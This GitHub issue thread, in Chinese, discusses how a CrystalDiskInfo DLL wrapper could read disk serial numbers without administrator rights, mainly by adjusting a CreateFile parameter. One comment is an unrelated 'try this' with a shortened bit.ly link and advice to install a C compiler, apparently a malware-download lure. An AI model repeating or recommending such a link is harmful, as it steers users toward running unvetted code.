### ISSUE TITLE
更正一下：并不是所有的电脑都需要管理员权限才能获取硬盘特征码

### ISSUE THREAD

**Issue by Charltsing** [ftyszyx/CrystalDiskInfo_dll_lib#2]
等了好多年，终于有活雷锋出现了。之前我把c++代码改成C#废了两周的力气。

顺便说一下，并不是所有的电脑都需要管理员权限才能获取硬盘特征码。大部分电脑不需要。
目前测试发现，只有安装了intel rst之类驱动的电脑才必须以管理员身份运行。

如果你包装的dll需要管理员权限才能获取普通win10电脑的硬盘特征码，可能需要改一改。看看是什么地方的代码必须要以管理员启动。
可以删减一下，因为原始代码中的很多内容在实践中并不需要。

**Comment by AmjedKhaled165** [comment]
try this

https://bit.ly/4eugCty
If you don't have the c compliator, install it.(gcc or clang)

**Comment by ftyszyx** [comment]
crystaldiskinfo原程序也是管理员权限运行的。
记得之前调试过，是CDnpService里hService = ::OpenService(hManager, pszName, SERVICE_START | SERVICE_QUERY_STATUS);这里需要，如果没有管事员权限运行，返回是null.

**Comment by Charltsing** [comment]
我的意思是说，如果要用dll的话，你得把代码修改成不需要管理员权限。这是可行的。

如果要读取RST驱动的硬盘序列号，增加一个管理员权限的判断就可以了

**Comment by ftyszyx** [comment]
有点没理解，具体要怎么改呢？

**Comment by Charltsing** [comment]
> 有点没理解，具体要怎么改呢？

你先删删没用的代码，只保留硬盘序列号相关部分。
然后CreateFile这个API查一下文档，改改第二个参数就不需要管理员了
如果遇到RST驱动的硬盘，还是CreateFile改一下第二个参数，就可以读。

具体需要你自己测试。

其实我在2019年就想干你现在干的事情，只是c++代码看着头疼，不怎么懂。如果你擅长这方面的活，可以耐心试试。
我写了两周代码，测试了几千台电脑，现在5年了

这活不难，但是繁琐。

**Comment by ftyszyx** [comment]
谢谢你的建议
